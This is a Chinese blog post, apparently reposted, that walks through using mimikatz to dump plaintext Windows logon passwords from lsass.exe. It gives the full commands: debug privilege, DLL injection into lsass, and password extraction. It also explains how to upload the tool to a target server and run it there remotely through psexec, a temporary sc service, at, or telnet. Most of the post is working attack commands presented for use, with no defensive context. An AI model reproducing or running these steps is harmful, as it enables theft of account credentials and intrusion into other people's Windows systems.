close

昨天弄了下OphCrack,一個破解windows密碼的玩意,順帶想起了這個神器,mimikatz,本人首創中文譯名為:咪咪卡住,不要笑,這是很嚴肅的名字。

咪咪卡住的下載地址:

mimikat是一個法國人寫的輕量級調試器,因為牛逼,所以成了神器。神器之所以出名了,是因為神器可以直接從lsass.exe 裡獲取windows處於active狀態賬號明文密碼,是很強大的。下面看看從我的Win7 64位上面抓密碼。進入咪咪卡住的目錄,

1
2
3
4
5
6
7
8
//開始運行神器
mimikatz
//提升權限
privilege::debug
//注入dll
inject::process lsass.exe sekurlsa.dll
//抓取密碼
@getLogonPasswords

不管密碼多麼複雜都能抓出來

作者的回答的原因是,在llsass中,明文密碼經過加密算法的密文 (這個加密算法是可逆的 能被解密出明文)

這個咪咪卡住啦,支持

1
2
3
4
5
6
Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

在遠程終端(3389、mstsc.exe

通常你在遠程終端中運行該程序會提示:存儲空間不足,無法處理此命令。

這是因為在終端模式下,不能插入遠線程,跨會話不能注入,你需要使用如下方法執行該程序:

首先提取幾個文件,只抓取密碼的話,只需要這幾個文件:

1
2
3
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包後上傳至目標服務器,然後解壓釋放,注意路徑中絕對不能有中文(可以有空格)!否則加載DLL的時候會報錯:找不到文件。

然後使用以下任何一種方法即可抓取密碼:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
//最簡單實用的方法,使用 PsExec.exe 啟動。
//在系統帳戶中運行 cmd.exe,或者直接運行 mimikatz.exe
psexec -s cmd.exe
//啟動 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提升權限
privilege::debug
//注入dll,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密碼
@getLogonPasswords
//退出,不要用 ctrl + c,會導致 mimikatz.exe CPU 佔用達到 100%,死循環。
exit
 
//*********************************************************
 
//使用 At 啟動
at ***
 
//*********************************************************
 
//創建服務方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword
 
//*********************************************************
 
//telnet 遠程命令管道
telnet ****
文章標籤
mimikatz
全站熱搜
創作者介紹
創作者 好康搬運工 的頭像
好康搬運工

好康搬運工

好康搬運工 發表在 痞客邦 留言(0) 人氣()